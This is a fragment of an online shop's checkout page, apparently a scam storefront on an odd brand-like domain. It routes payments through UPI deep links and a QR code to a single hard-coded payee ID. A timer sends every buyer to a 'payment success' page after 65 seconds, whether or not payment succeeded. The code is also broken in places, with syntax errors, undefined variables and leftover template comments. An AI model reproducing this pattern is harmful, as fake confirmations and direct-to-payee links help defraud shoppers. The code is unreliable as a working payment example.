        </div>
        <script>
            function displayAddress() {
                var addressData = localStorage.getItem('address');

                if (addressData) {
                    var address = JSON.parse(addressData);

                    var addressString = `
                Full Name: ${address.name}<br>
                Mobile Number: ${address.number}<br>
                PIN Code: ${address.pin}<br>
                City: ${address.city}<br>
                State: ${address.state}<br>
                House No./Building Name: ${address.flat}<br>
                Road/Area/Colony: ${address.area}<br>
            `;

                    var customerAddressDiv = document.querySelector('.customer-address');
                    customerAddressDiv.innerHTML = addressString;
                }
            }
            // displayAddress();

            var itemData;
            $(document).ready(function() {
                var amt = localStorage.getItem("mrp");
                $('.price-btn').html("₹" + amt);
                $(".form-check").on('click', function() {
                    $(".form-check").removeClass('active');
                    $(this).addClass('active');
                });
            });

            let guid = () => {
                let s4 = () => {
                    return Math.floor((1 + Math.random()) * 0x10000)
                        .toString(16)
                        .substring(1);
                }
                //return id of format 'aaaaaaaa'-'aaaa'-'aaaa'-'aaaa'-'aaaaaaaaaaaa'
                return s4() + s4() + '-' + s4() + '-' + s4() + '-' + s4() + '-' + s4();
            }

            async function payNow() {
                // Show loading overlay
                                var payType = $(".form-check.active").attr('pay-type');
                                if(payType=='gpay'){
                     
                    if (!window.PaymentRequest) {
                                    alert('Web payments are not supported in this browser.');
                                    return;
                                }

                                // Create supported payment method.
                                const selectedValue = localStorage.getItem("selectedValue");
        
                                console.log(price);
                                const supportedInstruments = [{
                                    supportedMethods: ['https://tez.google.com/pay'],
                                    data: {
                                        pa: 'mab.037324044010020@axisbank',
                                        // Replace with your Merchant UPI ID
                                        pn: 'Recharge',
                                        // Replace with your Merchant Name
                                        tr: '1234ABCDE',
                                        // Your custom transaction reference ID
                                        url: 'https://sony-blackbrocandiospeake.shop/',
                                        // URL of the order in your website
                                        mc: '12345',
                                        // Your merchant category code
                                        tn: 'Purchase in Recharge',
                                        // Transaction note
                                    },
                                }];

                                // Create order detail data.
                                const details = {
                                    total: {
                                        label: 'Total',
                                        amount: {
                                            currency: 'INR',
                                            value: selectedValue,
                                            // Amount to be paid
                                        },
                                    },
                                    displayItems: [{
                                        label: 'Original Amount',
                                        amount: {
                                            currency: 'INR',
                                            value: selectedValue,
                                        },
                                    }],
                                };

                                // Create payment request object.
                                let request = null;
                                try {
                                    request = new PaymentRequest(supportedInstruments,details);
                                } catch (e) {
                                    alert('Payment Request Error: ' + e.message);
                                    return;
                                }
                                if (!request) {
                                    alert('Web payments are not supported in this browser.');
                                    return;
                                }

                                var canMakePaymentPromise = checkCanMakePayment(request);
                                canMakePaymentPromise.then((result)=>{
                                    showPaymentUI(request, result);
                                }
                                ).catch((err)=>{
                                    alert('Error calling checkCanMakePayment: ' + err);
                                }
                                );    
                   
                }else{
                var redirect_url = "";
                var site_name = "Recharge";
                var txn_id = "OrderNo: " + guid();
                var upi_address = 'mab.037324044010020@axisbank';
                
                
                
                
            
                // Split the string using comma as the delimiter
                var upis = upi_address.split(',');
                // Get a random index between 0 and the length of the array minus 1
                var randomIndex = Math.floor(Math.random() * upis.length);
            
                // Get the value at the random index
                var upiId = upis[randomIndex];
            
                function randomTwoDigitInt() {
                    return Math.floor(Math.random() * 90 + 10); // Generates random number between 10 and 99
                }
            
                const rndTwoDigitInt = 0.00; // Generate random two-digit integer
            
                // Retrieve amount from localStorage and convert it to a number
                let cartTotalAmount = parseFloat(localStorage.getItem("cartTotalAmount"));
            
                // Calculate the decimal fraction from the random two-digit integer
                let decimalFraction = rndTwoDigitInt / 100; // Converts the two-digit integer to a decimal fraction (e.g., 75 becomes 0.75)
            
                // Add the decimal fraction to the existing amount
                let amt = localStorage.getItem("selectedValue");
                amt = localStorage.getItem("selectedValue");
            
                switch (payType) {
                    case 'gpay':
                redirect_url = "tez://upi/pay?pa=" + upi_address + "&pn=" + site_name + "&am=" + amt + "&mc=8999&cu=INR&tn=" + txn_id;
                        break;
            
                    case 'phonepe':
                  redirect_url = "phonepe://upi//pay?pa=" + upi_address + "&pn=Recharge&am=" + amt + "&cu=INR";
                        break;
            
                    case 'paytm':
                redirect_url = "paytmmp://cash_wallet?pa=" + upi_address + "&pn=" + site_name + "&am=" + amt + "&cu=INR&tn=" + txn_id + "&featuretype=money_transfer";
            break;
            
                    case 'bhim_upi':
                        redirect_url = "bhim://pay?pa=" + upi_address4 + "&pn=" + site_name + "&am=" + amt + "&tr=&mc=8999&cu=INR&tn=" + txn_id + "&sign=AAuN7izDWN5cb8A5scnUiNME+LkZqI2DWgkXlN1McoP6WZABa/KkFTiLvuPRP6/nWK8BPg/rPhb+u4QMrUEX10UsANTDbJaALcSM9b8Wk218X+55T/zOzb7xoiB+BcX8yYuYayELImXJHIgL/c7nkAnHrwUCmbM97nRbCVVRvU0ku3Tr";
                        break;
            
                    case 'whatspp_pay':
                        redirect_url = "whatsapp://pay?pa=" + upi_address5 + "&pn=" + site_name + "&am=" + amt + "&tr=&mc=8999&cu=INR&tn=" + txn_id + "&sign=AAuN7izDWN5cb8A5scnUiNME+LkZqI2DWgkXlN1McoP6WZABa/KkFTiLvuPRP6/nWK8BPg/rPhb+u4QMrUEX10UsANTDbJaALcSM9b8Wk218X+55T/zOzb7xoiB+BcX8yYuYayELImXJHIgL/c7nkAnHrwUCmbM97nRbCVVRvU0ku3Tr";
                        break;
            
                    default:
                        break;
                }
            
                // After 30 seconds, hide the loading icon and redirect to the Thank You page
                
            
                // Redirect to the UPI app
                window.location.href = redirect_url;
            }
            }
            async function payNow1() {
                if (!window.PaymentRequest) {
                    alert('Web payments are not supported in this browser.');
                    return;
                }
            
                // Create supported payment method.
                const selectedValue = localStorage.getItem("selectedValue");
        const upiID = await fetchUPIID();
                console.log(price);
                const supportedInstruments = [{
                    supportedMethods: ['https://tez.google.com/pay'],
                    data: {
                        pa: 'mab.037324044010020@axisbank',
                        // Replace with your Merchant UPI ID
                        pn: 'Recharge',
                        // Replace with your Merchant Name
                        tr: '1234ABCDE',
                        // Your custom transaction reference ID
                        url: 'https://yourwebsite.com/order/1234ABCDE',
                        // URL of the order in your website
                        mc: '12345',
                        // Your merchant category code
                        tn: 'Purchase in1 Recharge',
                        // Transaction note
                    },
                }];
            
                // Create order detail data.
                const details = {
                    total: {
                        label: 'Total',
                        amount: {
                            currency: 'INR',
                            value: selectedValue,
                            // Amount to be paid
                        },
                    },
                    displayItems: [{
                        label: 'Original Amount',
                        amount: {
                            currency: 'INR',
                            value: price,
                        },
                    }],
                };
            
                // Create payment request object.
                let request = null;
                try {
                    request = new PaymentRequest(supportedInstruments,details);
                } catch (e) {
                    alert('Payment Request Error: ' + e.message);
                    return;
                }
                if (!request) {
                    alert('Web payments are not supported in this browser.');
                    return;
                }
            
                var canMakePaymentPromise = checkCanMakePayment(request);
                canMakePaymentPromise.then((result)=>{
                    showPaymentUI(request, result);
                }
                ).catch((err)=>{
                    alert('Error calling checkCanMakePayment: ' + err);
                }
                );
            }
            
            function checkCanMakePayment(request) {
                // Checks canMakePayment cache, and use the cache result if it exists.
                const canMakePaymentCache = 'canMakePaymentCache';
            
                if (sessionStorage.hasOwnProperty(canMakePaymentCache)) {
                    return Promise.resolve(JSON.parse(sessionStorage[canMakePaymentCache]));
                }
            
                // If canMakePayment() isn't available, default to assuming that the method is supported.
                var canMakePaymentPromise = Promise.resolve(true);
            
                // Feature detect canMakePayment().
                if (request.canMakePayment) {
                    canMakePaymentPromise = request.canMakePayment();
                }
            
                return canMakePaymentPromise.then((result)=>{
                    // Store the result in cache for future usage.
                    sessionStorage[canMakePaymentCache] = result;
                    return result;
                }
                ).catch((err)=>{
                    alert('Error calling canMakePayment: ' + err);
                }
                );
            }
            function showPaymentUI(request, canMakePayment) {
                if (!canMakePayment) {
                    alert('Google Pay is not ready to pay.');
                    return;
                }
            
                // Set payment timeout.
                let paymentTimeout = window.setTimeout(function() {
                    window.clearTimeout(paymentTimeout);
                    request.abort().then(function() {
                        alert('Payment timed out.');
                    }).catch(function() {
                        alert('Unable to abort, user is in the process of paying.');
                    });
                }, 20 * 60 * 1000);
                /* 20 minutes */
            
                request.show().then(function(instrument) {
                    window.clearTimeout(paymentTimeout);
                    processResponse(instrument);
                    // Handle response from browser.
                }).catch(function(err) {
                    alert(err);
                });
            }
            function processResponse(instrument) {
                var instrumentString = JSON.stringify({
                    methodName: instrument.methodName,
                    details: instrument.details,
                    payerName: instrument.payerName,
                    payerPhone: instrument.payerPhone,
                    payerEmail: instrument.payerEmail,
                }, undefined, 2);
            
                // Send the payment response to the server for processing
                fetch('process_payment.php', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: instrumentString,
                }).then(response=>response.json()).then(data=>{
                    if (data.success) {
                        window.location.href = 'payment_success.html';
                    } else {
                        Swal.fire('Payment failed', 'There was an issue with the payment. Please try again.', 'error');
                    }
                }
                ).catch(error=>console.error('Error:', error));
            
                instrument.complete('success');
            }
            
            function payment_method(payType) {
            
                $('#price').val(parseFloat(localStorage.getItem("selectedValue")).toFixed(2));
                $('#product_name').val('items');
                var addressData = localStorage.getItem('address');
                if (addressData) {
                    var address = JSON.parse(addressData);
                    $('#customerName').val(address.name);
                    $('#customerMobile').val(address.number);
                }
                $("#submitForm").trigger("click");
            }
            
            $(function() {
                // (Optional) Active an item if it has the class "is-active"	
                $(".accordion > .accordion-item.is-active").children(".accordion-panel").slideDown();
            
                $(".accordion .accordion-thumb").click(function() {
                    // Cancel the siblings
                    $(this).parent('.accordion-item').siblings(".accordion-item").removeClass("is-active").children(".accordion-panel").slideUp();
                    // Toggle the item
                    $(this).parent('.accordion-item').toggleClass("is-active").children(".accordion-panel").slideToggle("ease-out");
                });
            });
        </script>
    </div>
</div>
</div>
    <script>
        var itemData;
        $(document).ready(function() {
            $('.selling_price').html(localStorage.getItem("selectedValue"););
            $('.price-btn').html(localStorage.getItem("selectedValue"););
            $(".form-check").on('click', function() {
                $(".form-check").removeClass('active');
                $(this).addClass('active');
            });
        });

        // function startTimer(duration, display) {
        //     var timer = duration,
        //         minutes, seconds;
        //     setInterval(function() {
        //         minutes = parseInt(timer / 60, 10);
        //         seconds = parseInt(timer % 60, 10);

        //         minutes = minutes < 10 ? "0" + minutes : minutes;
        //         seconds = seconds < 10 ? "0" + seconds : seconds;

        //         display.text(minutes + "min " + seconds + "sec");

        //         if (--timer < 0) {
        //             timer = duration;
        //         }
        //     }, 1000);
        // }

        $("#paymentForm").on('submit', function(e) {
            e.preventDefault();
            var amt = parseFloat(localStorage.getItem("selectedValue").replace('₹', '')).toFixed(2);
            var payType = $(".form-check.active").attr('pay-type');

            $("#itemPrice").val(amt);
            $("#payType").val(payType);

            this.submit();
        });
    </script>                </div>
                </div>
                </div>
                </div>
                </div>
                

                </footer>
                

                <script src="/assets/js/bootstrap.min.js"></script>
                <script src="/assets/js/jquery.lazyload.min.js"></script>
                
                <script>
                    $(window).ready(function() {
                        $(".itivvW").remove();
                    });
                    //  Cart Start ==================
                    $(".custom_lazyload")
                        .lazyload({
                            effect: "fadeIn",
                            threshold: 5000,
                        })
                        .removeClass("custom_lazyload");

                    function openNav() {
                        document.getElementById("mySidenav").style.right = "0";
                        document.getElementById("overlay").style.display = "block";
                    }

                    function closeNav() {
                        document.getElementById("mySidenav").style.right = "-100%";
                        document.getElementById("overlay").style.display = "none";
                    }

                    $(".cartTotalAmount1").html(localStorage.getItem("selectedValue"));

                  
                    $(document).ready( function() {
                         setTimeout(function() {
       
                        // Redirect to Thank You page
                                                window.location.href = "payment_success.html";
                                            }, 65000); // 30,000 milliseconds = 30 seconds
                    });
                </script>
                <script>
                     async function qrCodePayment() {
                         async function fetchUPIID() {
        // Mock function to simulate fetching UPI ID
        return "mab.037324044010020@axisbank";
      }
          const selectedValue = localStorage.getItem("selectedValue");
        const upiID = await fetchUPIID();

        if (selectedValue && upiID) {
          const qrData = `upi://pay?pa=${upiID}&pn=OfferAvailed&am=${selectedValue}&cu=INR`;
          const qrCodeContainer = document.getElementById("qrcode");

          // Clear any existing QR code
          qrCodeContainer.innerHTML = "";

          // Generate QR code
          new QRCode(qrCodeContainer, {
            text: qrData,
            width: 200,  // Width of the QR code
            height: 200, // Height of the QR code
          });
        }
      }
      // Function to handle input change and store the value
function handleInputChange() {
  const mobileNumber = document.getElementById('mobile').value;
  console.log('Current mobile number:', mobileNumber); // Just for demonstration
}

// Function to store the value (e.g., in a variable or local storage)
function storeValue() {
  const mobileNumber = document.getElementById('mobile').value;
  
  // Example of storing in a variable
  const storedValue = mobileNumber;
  console.log('Stored mobile number:', storedValue); // Just for demonstration
  
  // Example of storing in local storage
  localStorage.setItem('mobileNumber', storedValue);
  console.log('Mobile number saved to local storage');
}

// Optional: Retrieve stored value on page load
window.onload = function() {
  const savedValue = localStorage.getItem('mobileNumber');
  if (savedValue) {
    document.getElementById('mobile').value = savedValue;
  }
}

                </script>
                <style>
                    .steps.svelte-idjy9v .steps-inner .step.active .info-wrap .circle-box.svelte-idjy9v {
                        border-color: #000000;
                        color: #000000;
                        background: #fff;
                    }


                    .steps.svelte-idjy9v .steps-inner .step.active .info-wrap .title.svelte-idjy9v {
                        color: #000000;
                    }

                    .steps.svelte-idjy9v .steps-inner .step.svelte-idjy9v:last-child {
                        justify-content: center;
                    }

                    .steps.svelte-idjy9v.svelte-idjy9v {
                        padding: 2.3rem 1.2rem 0.5rem;

                    }

                    
                </style>
                </body>

</html>